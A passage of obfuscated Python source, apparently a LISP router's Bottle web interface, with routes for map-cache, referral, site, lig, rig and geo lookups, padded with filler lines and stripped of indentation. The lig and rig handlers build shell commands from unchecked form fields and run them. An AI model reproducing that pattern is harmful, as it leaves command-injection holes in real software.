if ( dns == "dns" ) :
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show rtr-map-cache-dns" ) )
else :
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show rtr-map-cache" ) )
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
if 77 - 77: Oo0Ooo
@ bottle . route ( '/lisp/show/rtr/rloc-probing' )
def i1i111Iiiiiii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 19 - 19: I1IiiI . Oo0Ooo + OoooooooOO - I1IiiI
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show rtr-rloc-probing" ) )
if 93 - 93: iIii1I11I1II1 + I1IiiI + i11iIiiIii
if 74 - 74: I11i / II111iiii + ooOoO0o * iIii1I11I1II1 - I1Ii111 - OoO0O00
if 69 - 69: iIii1I11I1II1 * I1IiiI - iII111i + O0 + O0
if 65 - 65: I1Ii111 / i11iIiiIii / OoO0O00 - OOooOOo
if 9 - 9: I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
@ bottle . post ( '/lisp/show/rtr/map-cache/lookup' )
def oO00 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 7 - 7: O0 % I1Ii111 + I1ii11iIi11i + Ii1I % OoooooooOO . Oo0Ooo
if 56 - 56: iII111i
oo0O0o = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oo0O0o ) == False ) :
iIiIIIi = "Address '{}' has invalid format" . format ( oo0O0o )
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 84 - 84: OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
Oo0O0 = "show rtr-map-cache" + "%" + oo0O0o
return ( lispconfig . lisp_process_show_command ( Ooo ,
Oo0O0 ) )
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
@ bottle . route ( '/lisp/show/referral' )
def i1iiii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show referral-cache" ) )
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
if 71 - 71: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
@ bottle . post ( '/lisp/show/referral/lookup' )
def OoO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 71 - 71: OoO0O00 - OoooooooOO * Oo0Ooo
if 38 - 38: iIii1I11I1II1 / ooOoO0o
oo0O0o = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oo0O0o ) == False ) :
iIiIIIi = "Address '{}' has invalid format" . format ( oo0O0o )
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 13 - 13: iIii1I11I1II1
if 77 - 77: i11iIiiIii - iIii1I11I1II1 / oO0o / ooOoO0o / OoO0O00
Oo0O0 = "show referral-cache" + "%" + oo0O0o
return ( lispconfig . lisp_process_show_command ( Ooo , Oo0O0 ) )
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
@ bottle . route ( '/lisp/show/delegations' )
def ooo000oOO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 27 - 27: o0oOOo0O0Ooo * i11iIiiIii * OoO0O00
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show delegations" ) )
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
@ bottle . post ( '/lisp/show/delegations/lookup' )
def O0O ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 51 - 51: oO0o + OoO0O00 + iII111i + iII111i % o0oOOo0O0Ooo
if 29 - 29: ooOoO0o
oo0O0o = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oo0O0o ) == False ) :
iIiIIIi = "Address '{}' has invalid format" . format ( oo0O0o )
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 41 - 41: O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
Oo0O0 = "show delegations" + "%" + oo0O0o
return ( lispconfig . lisp_process_show_command ( Ooo , Oo0O0 ) )
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if 81 - 81: IiII / OoOoOO00 * IiII . O0
if 61 - 61: OoO0O00 * OOooOOo + I1Ii111 . iIii1I11I1II1 % I11i . I1Ii111
@ bottle . route ( '/lisp/show/site' )
@ bottle . route ( '/lisp/show/site/<eid_prefix>' )
def O0o0oo0oOO0oO ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 15 - 15: OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
Oo0O0 = "show site"
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
if 79 - 79: I1IiiI - ooOoO0o
return ( lispconfig . lisp_process_show_command ( Ooo , Oo0O0 ) )
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
@ bottle . route ( '/lisp/show/itr/dynamic-eid/<eid_prefix>' )
def O00O ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 63 - 63: OoooooooOO * OoooooooOO % OoO0O00 + O0 / I1Ii111 + iIii1I11I1II1
if 72 - 72: OoOoOO00 * iIii1I11I1II1 % I11i
Oo0O0 = "show itr-dynamic-eid"
if 20 - 20: II111iiii % iIii1I11I1II1 + oO0o * II111iiii * OoO0O00 % OoO0O00
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
if 15 - 15: oO0o / I1Ii111
return ( lispconfig . lisp_process_show_command ( Ooo , Oo0O0 ) )
if 37 - 37: i11iIiiIii + I1IiiI . OOooOOo % I11i % I11i
if 26 - 26: O0
if 34 - 34: ooOoO0o * I1Ii111
if 97 - 97: i11iIiiIii % oO0o / Oo0Ooo / Oo0Ooo
if 97 - 97: II111iiii - I1Ii111 - iIii1I11I1II1 * I1IiiI
if 54 - 54: iIii1I11I1II1
if 5 - 5: IiII
@ bottle . route ( '/lisp/show/etr/dynamic-eid/<eid_prefix>' )
def Oo0O0oo0o00o0 ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 66 - 66: iIii1I11I1II1 . i11iIiiIii / I11i / ooOoO0o + I1Ii111
if 5 - 5: OoOoOO00 % iII111i + IiII
Oo0O0 = "show etr-dynamic-eid"
if 13 - 13: IiII
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
if 19 - 19: II111iiii - IiII
return ( lispconfig . lisp_process_show_command ( Ooo , Oo0O0 ) )
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
@ bottle . post ( '/lisp/show/site/lookup' )
def IiII1i1iI ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
oo0O0o = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oo0O0o ) == False ) :
iIiIIIi = "Address '{}' has invalid format" . format ( oo0O0o )
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
Oo0O0 = "show site" + "%" + oo0O0o + "@lookup"
return ( lispconfig . lisp_process_show_command ( Ooo , Oo0O0 ) )
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
@ bottle . post ( '/lisp/lig' )
def iii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
O0OoO0o = bottle . request . forms . get ( "eid" )
I111IIiIII = bottle . request . forms . get ( "mr" )
OO0OOoo0OOO = bottle . request . forms . get ( "count" )
ooooOoo0OO = "no-info" if bottle . request . forms . get ( "no-nat" ) == "yes" else ""
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if ( I111IIiIII == "" ) : I111IIiIII = "localhost"
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if ( O0OoO0o == "" ) :
iIiIIIi = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
iIIi1Ii1III = ""
if os . path . exists ( "lisp-lig.pyo" ) : iIIi1Ii1III = "python -O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.pyc" ) : iIIi1Ii1III = "python3.8 -O lisp-lig.pyc"
if os . path . exists ( "lisp-lig.py" ) : iIIi1Ii1III = "python lisp-lig.py"
if 86 - 86: i11iIiiIii + i11iIiiIii . I1Ii111 % I1IiiI . ooOoO0o
if 17 - 17: Ii1I
if 67 - 67: O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if ( iIIi1Ii1III == "" ) :
iIiIIIi = "Cannot find lisp-lig.py or lisp-lig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if ( OO0OOoo0OOO != "" ) : OO0OOoo0OOO = "count {}" . format ( OO0OOoo0OOO )
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
Oo0O0 = '{} "{}" to {} {} {}' . format ( iIIi1Ii1III , O0OoO0o , I111IIiIII , OO0OOoo0OOO , ooooOoo0OO )
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
iIiIIIi = getoutput ( Oo0O0 )
iIiIIIi = iIiIIIi . replace ( "\n" , "<br>" )
iIiIIIi = lisp . convert_font ( iIiIIIi )
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
i111IiiI1Ii = lisp . space ( 2 ) + "RLOC:"
iIiIIIi = iIiIIIi . replace ( "RLOC:" , i111IiiI1Ii )
OooOOOOOo = lisp . space ( 2 ) + "Empty,"
iIiIIIi = iIiIIIi . replace ( "Empty," , OooOOOOOo )
o0oooOO00 = lisp . space ( 4 ) + "geo:"
iIiIIIi = iIiIIIi . replace ( "geo:" , o0oooOO00 )
i1I11ii = lisp . space ( 4 ) + "elp:"
iIiIIIi = iIiIIIi . replace ( "elp:" , i1I11ii )
o0ooO00O0O = lisp . space ( 4 ) + "rle:"
iIiIIIi = iIiIIIi . replace ( "rle:" , o0ooO00O0O )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
@ bottle . post ( '/lisp/rig' )
def i111I11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 80 - 80: iIii1I11I1II1 - OoooooooOO - I1ii11iIi11i - I1ii11iIi11i . OoooooooOO
if 48 - 48: I1Ii111 . i11iIiiIii / i1IIi % IiII % iII111i + oO0o
O0OoO0o = bottle . request . forms . get ( "eid" )
iiII1iiiiiii = bottle . request . forms . get ( "ddt" )
iiIiii = "follow-all-referrals" if bottle . request . forms . get ( "follow" ) == "yes" else ""
if 39 - 39: I1IiiI + Oo0Ooo
if 83 - 83: i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if ( iiII1iiiiiii == "" ) : iiII1iiiiiii = "localhost"
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if ( O0OoO0o == "" ) :
iIiIIIi = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
Ooo000O00 = ""
if os . path . exists ( "lisp-rig.pyo" ) : Ooo000O00 = "python -O lisp-rig.pyo"
if os . path . exists ( "lisp-rig.pyc" ) : Ooo000O00 = "python3.8 -O lisp-rig.pyo"
if os . path . exists ( "lisp-rig.py" ) : Ooo000O00 = "python lisp-rig.py"
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if ( Ooo000O00 == "" ) :
iIiIIIi = "Cannot find lisp-rig.py or lisp-rig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
Oo0O0 = '{} "{}" to {} {}' . format ( Ooo000O00 , O0OoO0o , iiII1iiiiiii , iiIiii )
if 6 - 6: ooOoO0o + OOooOOo / Oo0Ooo + IiII % II111iiii / OoO0O00
iIiIIIi = getoutput ( Oo0O0 )
iIiIIIi = iIiIIIi . replace ( "\n" , "<br>" )
iIiIIIi = lisp . convert_font ( iIiIIIi )
if 45 - 45: OoooooooOO
I1oo = lisp . space ( 2 ) + "Referrals:"
iIiIIIi = iIiIIIi . replace ( "Referrals:" , I1oo )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 17 - 17: O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
if 64 - 64: I11i + OoO0O00
if 25 - 25: I1IiiI . ooOoO0o + I1IiiI % Ii1I * iIii1I11I1II1
def iiI1iI ( eid1 , eid2 ) :
iIIi1Ii1III = None
if os . path . exists ( "lisp-lig.pyo" ) : iIIi1Ii1III = "python -O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.pyc" ) : iIIi1Ii1III = "python3.8 -O lisp-lig.pyc"
if os . path . exists ( "lisp-lig.py" ) : iIIi1Ii1III = "python lisp-lig.py"
if ( iIIi1Ii1III == None ) : return ( [ None , None ] )
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
if 12 - 12: I1ii11iIi11i / Ii1I
ii11 = getoutput ( "egrep -A 2 'lisp map-resolver {' ./lisp.config" )
I111IIiIII = None
for o0 in [ "address = " , "dns-name = " ] :
I111IIiIII = None
Ii11 = ii11 . find ( o0 )
if ( Ii11 == - 1 ) : continue
I111IIiIII = ii11 [ Ii11 + len ( o0 ) : : ]
Ii11 = I111IIiIII . find ( "\n" )
if ( Ii11 == - 1 ) : continue
I111IIiIII = I111IIiIII [ 0 : Ii11 ]
break
if 3 - 3: Ii1I + I1Ii111 . i1IIi / OOooOOo % I1Ii111
if ( I111IIiIII == None ) : return ( [ None , None ] )
if 98 - 98: IiII * iIii1I11I1II1 . Ii1I * Oo0Ooo / I1ii11iIi11i + ooOoO0o
if 25 - 25: oO0o
if 19 - 19: I1IiiI % Ii1I . IiII * ooOoO0o
if 89 - 89: OoOoOO00 . OOooOOo
IIIIIiI11Ii = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Iiii1Ii1I = [ ]
for O0OoO0o in [ eid1 , eid2 ] :
if 94 - 94: iIii1I11I1II1 - OoO0O00 . Oo0Ooo
if 59 - 59: OoO0O00 - OoO0O00 + iII111i
if 32 - 32: i1IIi / Oo0Ooo - O0
if 85 - 85: Ii1I - O0 * i11iIiiIii . i1IIi
if 20 - 20: iII111i / OOooOOo
if ( IIIIIiI11Ii . is_geo_string ( O0OoO0o ) ) :
Iiii1Ii1I . append ( O0OoO0o )
continue
if 28 - 28: ooOoO0o * I11i % i11iIiiIii * iII111i / Ii1I
if 41 - 41: OOooOOo - o0oOOo0O0Ooo + Ii1I
Oo0O0 = '{} "{}" to {} count 1' . format ( iIIi1Ii1III , O0OoO0o , I111IIiIII )
for I1i in [ Oo0O0 , Oo0O0 + " no-info" ] :
iIiIIIi = getoutput ( Oo0O0 )
Ii11 = iIiIIIi . find ( "geo: " )
if ( Ii11 == - 1 ) :
if ( I1i != Oo0O0 ) : Iiii1Ii1I . append ( None )
continue
if 15 - 15: I11i / o0oOOo0O0Ooo + Ii1I
iIiIIIi = iIiIIIi [ Ii11 + len ( "geo: " ) : : ]
Ii11 = iIiIIIi . find ( "\n" )
if ( Ii11 == - 1 ) :
if ( I1i != Oo0O0 ) : Iiii1Ii1I . append ( None )
continue
if 76 - 76: Ii1I + OoooooooOO / OOooOOo % OoO0O00 / I1ii11iIi11i
Iiii1Ii1I . append ( iIiIIIi [ 0 : Ii11 ] )
break
if 38 - 38: I1Ii111 . iII111i . I1IiiI * OoO0O00
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii / Ii1I
return ( Iiii1Ii1I )
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
@ bottle . post ( '/lisp/geo' )
def o0OO0oooo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 40 - 40: I1Ii111 - OoOoOO00 * I11i - IiII / OoOoOO00
if 71 - 71: oO0o / OoooooooOO % IiII / OoOoOO00 % I1Ii111
O0OoO0o = bottle . request . forms . get ( "geo-point" )
I1i1iI = bottle . request . forms . get ( "geo-prefix" )
iIiIIIi = ""
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
if 70 - 70: I11i + Oo0Ooo * iIii1I11I1II1 . I1IiiI * I11i
if 49 - 49: o0oOOo0O0Ooo
if 25 - 25: iII111i . OoooooooOO * iIii1I11I1II1 . o0oOOo0O0Ooo / O0 + Ii1I
ooo0o0 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
O00Oooo00 = lisp . lisp_geo ( "" )
ooO0 = lisp . lisp_geo ( "" )
ii111iiIii , oO0oiIiI = iiI1iI ( O0OoO0o , I1i1iI )
if 46 - 46: iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if ( ooo0o0 . is_geo_string ( O0OoO0o ) ) :
if ( O00Oooo00 . parse_geo_string ( O0OoO0o ) == False ) :
iIiIIIi = "Could not parse geo-point format"
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
elif ( ii111iiIii == None ) :
iIiIIIi = "EID {} lookup could not find geo-point" . format (
lisp . bold ( O0OoO0o , True ) )
elif ( O00Oooo00 . parse_geo_string ( ii111iiIii ) == False ) :
iIiIIIi = "Could not parse geo-point format returned from lookup"
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if ( iIiIIIi == "" ) :
if ( ooo0o0 . is_geo_string ( I1i1iI ) ) :
if ( ooO0 . parse_geo_string ( I1i1iI ) == False ) :
iIiIIIi = "Could not parse geo-prefix format"
if 64 - 64: O0 % ooOoO0o
elif ( oO0oiIiI == None ) :
iIiIIIi = "EID-prefix {} lookup could not find geo-prefix" . format ( lisp . bold ( I1i1iI , True ) )
if 40 - 40: o0oOOo0O0Ooo + I11i
elif ( ooO0 . parse_geo_string ( oO0oiIiI ) == False ) :
iIiIIIi = "Could not parse geo-prefix format returned from lookup"
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if ( iIiIIIi == "" ) :
O0OoO0o = "" if ( O0OoO0o == ii111iiIii ) else ", EID {}" . format ( O0OoO0o )
I1i1iI = "" if ( I1i1iI == oO0oiIiI ) else ", EID-prefix {}" . format ( I1i1iI )
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
if 26 - 26: OOooOOo * Oo0Ooo
i1iI1Ii11Ii1 = O00Oooo00 . print_geo_url ( )
o0OoO0oo0O0o = ooO0 . print_geo_url ( )
ii1III1iiIi = ooO0 . radius
I1ii1iI = O00Oooo00 . dms_to_decimal ( )
I1ii1iI = ( round ( I1ii1iI [ 0 ] , 6 ) , round ( I1ii1iI [ 1 ] , 6 ) )
ooO000OO = ooO0 . dms_to_decimal ( )
ooO000OO = ( round ( ooO000OO [ 0 ] , 6 ) , round ( ooO000OO [ 1 ] , 6 ) )
i111IIiIiiI1 = round ( ooO0 . get_distance ( O00Oooo00 ) , 2 )
OO0 = "inside" if ooO0 . point_in_circle ( O00Oooo00 ) else "outside"
if 28 - 28: Oo0Ooo % OOooOOo - OoO0O00 + ooOoO0o / ooOoO0o
if 82 - 82: Oo0Ooo
IIIIIi11111iiiII1I = lisp . space ( 2 )
I1I1i = lisp . space ( 1 )
iii1IiI1i = lisp . space ( 3 )
if 93 - 93: i1IIi % OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo . O0 % OOooOOo
iIiIIIi = ( "Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + "kilometer radius{}<br>" ) . format ( IIIIIi11111iiiII1I , i1iI1Ii11Ii1 , I1ii1iI , O0OoO0o ,
# Ii1I * oO0o - I11i + Oo0Ooo % I1ii11iIi11i - IiII
I1I1i , o0OoO0oo0O0o , ooO000OO , ii1III1iiIi , I1i1iI )
iIiIIIi += "Distance:{}{} kilometers, point is {} of circle" . format ( iii1IiI1i ,
i111IIiIiiI1 , lisp . bold ( OO0 , True ) )
if 81 - 81: O0 . O0
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 75 - 75: iIii1I11I1II1 % IiII + I1ii11iIi11i * O0 . iII111i - ooOoO0o
if 32 - 32: Ii1I % oO0o - i1IIi
if 40 - 40: iIii1I11I1II1 + iII111i * OoOoOO00 + oO0o
if 15 - 15: I11i % I1IiiI - iIii1I11I1II1 * ooOoO0o
if 71 - 71: OoOoOO00 % Oo0Ooo % ooOoO0o
